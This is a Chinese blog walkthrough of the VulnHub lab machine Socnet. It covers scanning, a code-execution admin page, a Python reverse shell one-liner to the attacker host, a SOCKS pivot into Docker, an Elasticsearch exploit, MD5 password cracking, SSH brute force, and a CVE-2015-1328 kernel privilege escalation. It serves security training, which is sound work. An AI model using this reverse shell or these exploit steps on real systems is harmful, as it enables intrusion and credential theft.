VulnHub靶机-Socnet

最新推荐文章于 2024-06-17 13:56:54 发布
最新推荐文章于 2024-06-17 13:56:54 发布
阅读量354 收藏
点赞数
分类专栏: 红队打靶 文章标签: java 数据库 网络 安全 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_47289634/article/details/131787728
版权

文章目录

实验环境

靶机地址:

https://www.vulnhub.com/entry/boredhackerblog-social-network,454/

靶机ip:192.168.56.101
攻击机:192.168.56.102

信息收集

存活主机探测

使用namp
在这里插入图片描述

使用netdiscover
在这里插入图片描述

端口服务探测

判断出靶机IP为101之后用nmap进行详细探测,端口扫描、服务探测、操作系统探测

nmap -sV -sC -O -p- 192.168.56.101

在这里插入图片描述
看到22端口开的open ssh服务,5000端口开的 http服务是由python2开发的Werkzeug框架搭建的,访问一下是个留言板界面
在这里插入图片描述

目录扫描

这里用的是kali自带的dirb,发现一个/admin界面
在这里插入图片描述
访问admin,发现是一个可以执行任意代码的test文件
在这里插入图片描述

反弹shell

可以执行任意代码,结合前期信息收集网站为python搭建,直接反弹shell

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.102",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

在这里插入图片描述
发现IP地址跟我们之前收集的不一样,查一下是否在docker中

cat /proc/1/cgroup

在这里插入图片描述

建立代理

使用venom工具去和kali进行连接,以便于使用kali去访问靶机内网
venom使用方法,点我
kali的是x64的,那么在venom的目录下,输入,监听6666端口

./admin_linux_x64 lport 6666

在这里插入图片描述

kali上使用python启动一个http服务,使用wget将agent_linux_x64下载到靶机
在这里插入图片描述

在这里插入图片描述
靶机启动刚刚上传的,记得先给权限,chmod -R 777 agent_linux_x64
在这里插入图片描述

连接成功后使用show命令去查找节点,然后使用goto去连接这个节点
启动一个socks监听

socks 1000
在这里插入图片描述
修改kali里的/etc/proxychains4.conf文件
修改为sock5 127.0.0.1 1000(venom开启的socks监听)
在这里插入图片描述

内网探测

漏洞发现

这时候就可以使用kali的工具通过代理去探测靶机内网信息,使用nmap发现在172.17.0.2主机上发现了一个不一样的端口,9200

proxychains nmap -Pn -sT -sV 172.17.0.2

在这里插入图片描述
对9200端口进行扫描,发现开放了Elasticsearch服务

proxychains nmap -p 9200 -Pn -sT -sV 172.17.0.2

在这里插入图片描述
这里还可以让浏览器走代理访问一下9200这个端口对应的网站
在这里插入图片描述

漏洞利用

使用Elasticsearch查看是否有漏洞和可以利用的脚本文件

searchsploit Elasticsearch

在这里插入图片描述

将第一个复制到当前路径下

searchsploit -m 36337.py ./

在这里插入图片描述
使用exp直接拿到0.2的root权限

proxychains python2 36337.py 172.17.0.2

在这里插入图片描述
在根目录下发现一个存储密码的文件passwords
在这里插入图片描述
cat 看一下,发现几个账号密码,但是密码是加密的

在这里插入图片描述
使用工具对MD5进行解密

john:1337hack
test:1234test
admin:1111pass
root:1234pass
jane:1234jane

知道账号密码后可以使用hydra进行ssh爆破,发现john 1337hack可以登录,ssh登录
在这里插入图片描述

在这里插入图片描述

权限提升

看到是一台Ubuntu 14.04 内核版本为Linux 3.13,权限为普通用户,发现内核版本过低,那么尝试内核提权

searchsploit Linux 3.13.0

发现可以利用的脚本
在这里插入图片描述
复制一下

searchsploit -m 37292.c ./

发现需要使用gcc编译,但是靶机没有gcc,我们只能把这个编译好的文件传到靶机上去执行。
修改代码,将下图中两个方框之间的代码删掉
在这里插入图片描述
寻找编译过的ofs-lib.so文件,复制到跟exp在同一个目录

locate ofs-lib.so
cp /usr/share/metasploit-framework/data/exploits/CVE-2015-1328/ofs-lib.so ./

在这里插入图片描述

开启python服务,将文件传输到靶机
在这里插入图片描述
因为编译的文件要在/tmp目录下,将文件转移到/tmp目录下,并赋予执行权限

ls                                      #ls命令发现当前目录只有我们刚刚下载的exp文件和so文件
mv * /tmp/                              #将当前目录下的所有文件移动到tmp目录下
chmod -R 777 exp                            #赋权
./exp                                   #执行

出现这个错误,是因为kali 上编译时的 /lib/x86_64-linux-gnu/libc.so.6 动态库高于靶机的
在这里插入图片描述
解决方法:

下载libc6_2.19-0ubuntu6_amd64.deb解压
dpkg -e libc6_2.19-0ubuntu6_amd64.deb

dpkg -x libc6_2.19-0ubuntu6_amd64.deb ./(需要指定路径)

然后通过-Ldir指定解压的文件下的/lib/x86_64-linux-gnu/libc.so.6

输入gcc 37292.c -o exp -Ldir ./lib/x86_64-linux-gnu/libc.so.6 重新编译

重复上面的传文件的操作,把exp重新传到靶机的/tmp目录,运行,提权成功
在这里插入图片描述

总结

好麻烦,养养眼
在这里插入图片描述

青衫木马牛
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
vulnhub靶场:SOCIAL NETWORK(难度等级:medium)
薄酒清欢的博客
09-03 502
SOCIAL NETWORK系列的靶场与常规靶场略有不同,拿到手的时候只有一个登录界面,他的ip地址、端口号、账号密码、服务类型、框架结构等信息全都需要我们手动探索。靶场难度为中等难度,这也意味着仅靠一两种进攻手段是无法getshell的, 需要将多种攻击方式综合起来灵活运用。
vulnhub靶场-SOCIAL NETWORK
qq_42947816的博客
05-10 493
Vulnhub旨在提供环境,让任何人都能在数字安全、计算机软件和网络管理方面获得实际的“实践”经验。
漏洞靶场实战-Vuluhub medium_socnet
Love&Share
05-06 2057
文章目录下载安装配置 VB 和 VM 的网络链接实战1.主机发现2.第一台主机漏洞利用拿shell方法一:NC监听方法二:MSF shell横向移动**方法一:MSF方法二:工具代理3.第二台主机漏洞利用漏洞发现漏洞利用 下载安装 Vulnhub 是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地 VM 打开即可,但是很多靶场不兼容 Vmware 比如本次用的靶场就不兼容,所以推荐 VirtualBox 本次复现靶场下载地址 下载的是一个 ovf 后缀的文件,打开 VirtualBox,导.
medium_socnet
果粒程
11-21 828
vulnhub-medium_socnet靶机打靶过程
Vulnhub靶机实战-Warzone 2
黑白的博客
01-10 395
声明 好好学习,天天向上 搭建 使用virtualbox打开,网络配置和我的PRESIDENTIAL文章一样,是要vmware和virtualbox互连 渗透 存活扫描,发现目标 arp-scan -l nmap -sP 192.168.239.1/24 端口扫描 nmap -T4 -A 192.168.239.10 -p 1-65535 -oN nmap.A 开启端口 21,22,1337 以匿名用户登录ftp 三张图片分别是用户名密码和token,旗语吗?只在亮剑里面看过旗语 对照解密后: u
vulnhub靶机渗透测试DC-2靶机渗透
m0_62008601的博客
04-29 1402
攻击机-kali-IP:192.168.56.102 靶机-dc2-ip:192.168.103 关于我的这两台机子的网络设置在上一篇文章中已经提到,这里就不再叙述。 查找dc-2 的IP arp-scan-l 得到ip为192.168.56.103 扫描开启的端口 nmap -sV -p- 192.168.56.103 此时发现开启了80端口和ssh服务且将ssh服务的端口改成了7744端口(ssh默认端口是:22) 因为开启了80端口,此时我们可以去访问它的web服务 此
vulnhub靶机DC4
weixin_52450702的博客
11-02 587
dc-4靶机ip:192.168.70.163靶机下载地址:https://download.vulnhub.com/dc/DC-4.zip.torrent。
Vulnhub-medium_socnet
weixin_46107179的博客
03-27 3717
靶机下载 搭建好靶机环境之后,进行全端口扫描,该靶机开放了22和5000端口 然后进行对端口进行服务扫描,得到一个python环境下搭建的web框架,版本是Werkzeug httpd 0.14.1,Werkzeug是一个WSGI工具包,也可以作为一个Web框架的底层库 然后在浏览器中访问该地址端口,并没有什么可以利用的;然后对隐藏目录进行扫描,得到一个admin目录 然后访问admin目录,得到一个可以执行代码的文本框 简单测试普通代码可以执行代码 接着我们可以在网上找一段利用Python代码进
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Spring 事务传播行为之Propagation.NESTED REQUIRES_NEW等探讨
最新发布
chengmin123456789的博客
06-17 91
当一个事务方法(标记为@Transactional(propagation = Propagation.NESTED))被另一个活动事务调用时,它会创建一个“保存点”(Savepoint)作为新的事务开始点。这意味着,如果这个嵌套事务方法内部发生异常并导致回滚,事务会回滚到这个保存点,而不会影响到外部事务的其他操作。如果一切正常,嵌套事务会在外部事务结束时一起提交。
【仿真建模-anylogic】FlowchartPort原理解析
zhaoyaxuan001的博客
06-14 315
FlowchartPort是流图组件端口的基类,一般不会直接使用;如果需要自行封装组件库时会用到;FlowchartPort继承Port类,并定义了一系列抽象函数;用于输入端口判定此刻是否不能接收Agent。用于输出端口判定是否有Agent准备离开。判定端口是否发生错误。
盲盒App开发时有哪些技术框架可以借鉴
bytekj的博客
06-14 537
在开发盲盒App时,可以根据项目需求和团队技术栈选择合适的技术框架。前端可以选择微信小程序框架、React Native或Vue.js等;后端可以选择Node.js或Spring Boot等;数据库可以选择MySQL或MongoDB等。同时,还需要考虑缓存、消息队列、支付和物流接口等其他技术来完善应用的功能和性能。
【2024最新华为OD-C/D卷试题汇总】[支持在线评测] CPU算力分配(100分) - 三语言AC题解(Python/Java/Cpp)
清隆学长的博客
06-11 404
### 问题描述 K小姐是某公司运营部门的主管,最近她需要对公司的两组服务器进行算力分配。每组服务器有多个算力不同的 $CPU$,其中 $A$ 组第 $i$ 个 $CPU$ 的运算能力为 $A[i]$,而 $B$ 组第 $i$ 个 $CPU$ 的运算能力为 $B[i]$。一组服务器的总算力是各 $CPU$ 的算力之和。 为了让两组服务器的算力相等,K小姐允许从每组各选出一个 $CPU$ 进行一次交换。她希望从 $A$ 组服务器中选出算力尽可能小的 $CPU$ 来交换,你能帮她计算出应该选择哪两个 $CP
微型操作系统内核源码详解系列四(3):操作系统调度算法(FreeRTOS内核篇上)
2301_77061352的博客
06-12 830
-uxTopPriority,被设定为是代表最大优先级的数字,自减操作代表从就绪列表最后一个链表(优先级最高的链表)开始查找,直到找到任务链表不为空的优先级任务,那么这个任务肯定也是所有任务中优先级最大的任务,然后获取这个任务的TCB并更新pxCurrentTCB(切换的具体函数),最后更新uxTopReadyPriority的值。容笔者说一下个人看法,从c语言和数据结构算法的层面学习,只能说是舍本逐末,透过Freertos这个小型系统,窥见庞大的操作系统架构的一角,这才是我们学习的重点。
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

青衫木马牛

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值